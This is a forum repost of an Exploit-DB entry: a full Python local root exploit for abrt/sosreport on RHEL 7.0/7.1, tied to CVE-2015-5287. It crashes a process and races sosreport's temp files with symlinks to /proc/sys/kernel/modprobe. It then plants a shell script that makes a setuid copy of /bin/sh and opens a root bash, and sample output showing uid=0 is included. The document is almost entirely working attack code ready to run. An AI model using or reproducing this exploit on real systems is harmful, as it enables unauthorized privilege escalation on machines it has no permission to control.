    [h=1]RHEL 7.0/7.1 - abrt/sosreport Local Root[/h] #!/usr/bin/python # CVE-2015-5287 (?) # abrt/sosreport RHEL 7.0/7.1 local root # rebel 09/2015 # [user@localhost ~]$ python sosreport-rhel7.py # crashing pid 19143 # waiting for dump directory # dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143 # waiting for sosreport directory # sosreport: sosreport-localhost.localdomain-20151130194114 # waiting for tmpfiles # tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ'] # moving directory # moving tmpfiles # tmpurfpyY -> tmpurfpyY.old # tmpYnCfnQ -> tmpYnCfnQ.old # waiting for sosreport to finish (can take several minutes)........................................done # success # bash-4.2# id # uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 # bash-4.2# cat /etc/redhat-release # Red Hat Enterprise Linux Server release 7.1 (Maipo) import os,sys,glob,time,sys,socket payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n" pid = os.fork() if pid == 0: os.execl("/usr/bin/sleep","sleep","100") time.sleep(0.5) print "crashing pid %d" % pid os.kill(pid,11) print "waiting for dump directory" def waitpath(p): while 1: r = glob.glob(p) if len(r) > 0: return r time.sleep(0.05) dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0] print "dump directory: ", dumpdir os.chdir(dumpdir) print "waiting for sosreport directory" sosreport = waitpath("sosreport-*")[0] print "sosreport: ", sosreport print "waiting for tmpfiles" tmpfiles = waitpath("tmp*") print "tmpfiles: ", tmpfiles print "moving directory" os.rename(sosreport, sosreport + ".old") os.mkdir(sosreport) os.chmod(sosreport,0777) os.mkdir(sosreport + "/sos_logs") os.chmod(sosreport + "/sos_logs",0777) os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log") os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log") print "moving tmpfiles" for x in tmpfiles: print "%s -> %s" % (x,x + ".old") os.rename(x, x + ".old") open(x, "w+").write("/tmp/hax.sh\n") os.chmod(x,0666) os.chdir("/") sys.stderr.write("waiting for sosreport to finish (can take several minutes)..") def trigger(): open("/tmp/hax.sh","w+").write(payload) os.chmod("/tmp/hax.sh",0755) try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132) except: pass time.sleep(0.5) try: os.stat("/tmp/sh") except: print "could not create suid" sys.exit(-1) print "success" os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''') sys.exit(-1) for x in xrange(0,60*10): if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read(): print "done" trigger() time.sleep(1) sys.stderr.write(".") print "timed out" Sursa: https://www.exploit-db.com/exploits/38832/
×
×
  • Create New...